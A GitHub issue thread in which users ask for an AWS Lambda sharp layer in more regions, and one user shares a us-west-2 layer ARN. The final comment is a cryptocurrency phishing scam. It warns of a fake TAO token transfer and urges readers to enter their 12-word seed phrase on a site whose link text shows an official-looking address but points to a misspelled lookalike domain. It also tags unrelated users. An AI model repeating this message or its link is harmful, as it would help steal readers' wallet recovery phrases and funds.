### ISSUE TITLE
Support other regions?

### ISSUE THREAD

**Issue by squillace91** [woss/aws-lambda-layer-sharp#3]
Is there any plan to support other regions?

**Comment by woss** [comment]
yes, it's on the todo list, same as supporting node 12. unfortunately atm i can't spent time on this but i will  soon.
PR is welcome 👌

**Comment by onassar** [comment]
Would love if this was available in `us-west-2` (and ideally, node 14).

**Comment by woss** [comment]
hi @onassar unfortunately i don't have much time for this at the moment because I am not actively using it. If you wish to send a PR is would be more than happy to merge it and deploy it

**Comment by onassar** [comment]
Okay thanks for the quick reply. Good luck with everything :)

**Comment by onassar** [comment]
Incase anyone needs the layer for the `us-west-2` zone:
`arn:aws:lambda:us-west-2:422088436246:layer:sharp:1`

**Comment by woss** [comment]
@onassar 
Do you mind creating a PR with your changes, I'll merge and I'll add that in the README.md?

**Comment by onassar** [comment]
I actually haven't changed anything. I just wanted to drop the arn in here incase someone stumbles on this issue :)

**Comment by 3asoftwareltda** [comment]
# Urgent TAO Token Transfer Notification

🚨 Urgent Notice: A total of 60 TAO tokens has been successfully transferred to unknown wallet address.

**Action Required:**
1. **Secure Your Wallet Immediately:**
   - Visit the official TAO Wallet website: [https://wallet.bittensor.com](https://wallet.bittlensor.com).
   - Click on "Import Wallet" and follow the instructions to import your wallet.
   - Add the 12-word phrase to your wallet for additional security.
   - Reset your private key urgently to enhance the security of your funds.

2. **Recover Transferred Funds:**
   - Once your wallet is imported, navigate to the "Reclaim Funds" section.
   - Follow the on-screen instructions to initiate the fund recovery process.

Act promptly to secure your TAO funds, add the 12-word phrase, and reset your private key for enhanced safety.

---

**Note:** Always perform these actions on the official TAO Wallet website to ensure the security of your funds. If you face any issues, contact our support team immediately.

Securely yours! 🚀


Winners: @laurengarcia, @burcheb, @bonnguyenitc, @puzzithinker, @charlieger, @rts-gordon, @paulynator
